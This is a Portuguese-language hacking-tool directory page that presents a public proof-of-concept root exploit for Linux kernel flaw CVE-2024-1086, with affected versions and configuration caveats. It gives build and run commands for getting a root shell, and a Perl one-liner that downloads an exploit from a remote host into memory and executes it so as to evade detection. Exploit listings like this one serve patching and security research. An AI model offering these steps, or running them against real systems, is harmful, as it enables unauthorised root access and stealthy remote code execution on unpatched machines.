Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-1086 — Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images. | Kitploit
Ferramentas/GitHubGitHub/notselwyn/cve-2024-1086
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingPapers & ResearchLearning & EducationBinary Exploitation
GitHubnotselwyn/cve-2024-1086

CVE-2024-1086

Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.

Ver RepositórioSite
2.5k330há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-1086

Exploração de prova de conceito universal de escalada de privilégios locais para CVE-2024-1086, funcionando na maioria dos kernels Linux entre v5.14 e v6.6, incluindo Debian, Ubuntu e KernelCTF. A taxa de sucesso é de 99,4% nas imagens do KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

Postagem no blog / Artigo

Um artigo completo sobre a exploração - incluindo informações de fundo e muitos diagramas úteis - pode ser encontrado na postagem do blog Flipping Pages.

Versões afetadas

A exploração afeta as versões de (incluindo) v5.14 a (incluindo) v6.6, excluindo os ramos corrigidos v5.15.149>, v6.1.76>, v6.6.15>. O patch para essas versões foi lançado em fevereiro de 2024. A vulnerabilidade subjacente afeta todas as versões (excluindo ramos estáveis corrigidos) de v3.15 a v6.8-rc1.

Ressalvas:

  • A exploração não funciona em kernels v6.4> com kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (incluindo Ubuntu v6.5)
  • A exploração requer namespaces de usuário (kconfig CONFIG_USER_NS=y), que esses namespaces de usuário sejam não privilegiados (comando sh = 1), e que nf_tables esteja habilitado (kconfig ). Por padrão, todos estão habilitados no Debian, Ubuntu e KernelCTF. Outras distribuições não foram testadas, mas podem funcionar também. Além disso, a exploração foi testada apenas em x64/amd64.
sysctl kernel.unprivileged_userns_clone
CONFIG_NF_TABLES=y
  • A exploração pode ser muito instável em sistemas com muita atividade de rede
    • Sistemas com adaptador WiFi, quando cercados por redes WiFi de alto uso, serão muito instáveis.
    • Em dispositivos de teste, desligue os adaptadores WiFi através da BIOS.
  • O kernel panic (falha do sistema) após executar a exploração é um efeito colateral que deliberadamente não foi corrigido para evitar o uso malicioso da exploração (ou seja, as tentativas de exploração devem agora ser mais perceptíveis e impraticáveis em operações do mundo real). Apesar disso, ainda permite uma prova de conceito funcional em ambientes de laboratório, pois o shell root é funcional e a persistência via disco é possível.
  • Uso

    Configuração

    Os valores padrão devem funcionar imediatamente no Debian, Ubuntu e KernelCTF com um shell local. Em configurações/distribuições não testadas, certifique-se de que os valores de kconfig correspondam ao kernel alvo. Eles podem ser especificados em src/config.h. Se você estiver executando a exploração em uma máquina com mais de 32GiB de memória física, certifique-se de aumentar CONFIG_PHYS_MEM. Se você estiver executando a exploração via SSH (na máquina de teste) ou um reverse shell, pode querer alternar CONFIG_REDIRECT_LOG para 1 para evitar atividade de rede desnecessária.

    Compilação

    Se isso for impraticável para você, há um binário x64 compilado com a configuração padrão.

    root@kitploit:~
    git clone https://github.com/Notselwyn/CVE-2024-1086
    cd CVE-2024-1086
    make
    

    Binário: CVE-2024-1086/exploit

    Execução

    Executar a exploração é igualmente trivial:

    root@kitploit:~
    ./exploit
    

    A execução sem arquivo também é suportada, em casos de situações de pentest onde as detecções precisam ser evitadas. No entanto, o Perl precisa estar instalado no alvo:

    root@kitploit:~
    perl -e '
      require qw/syscall.ph/;
    
      my $fd = syscall(SYS_memfd_create(), $fn, 0);
      system "curl https://example.com/exploit -s >&$fd";
      exec {"/proc/$$/fd/$fd"} "memfd";
    '
    

    Isenção de responsabilidade

    Os programas e scripts ("programas") neste diretório/pasta/repositório de software ("repositório") são publicados, desenvolvidos e distribuídos apenas para fins educacionais/de pesquisa. Eu ("o criador") não aprovo nenhum uso malicioso ou ilegal dos programas neste repositório, pois a intenção é compartilhar pesquisa e não realizar atividades ilegais com ele. Não sou legalmente responsável por nada que você faça com os programas neste repositório.

    Baixar ferramenta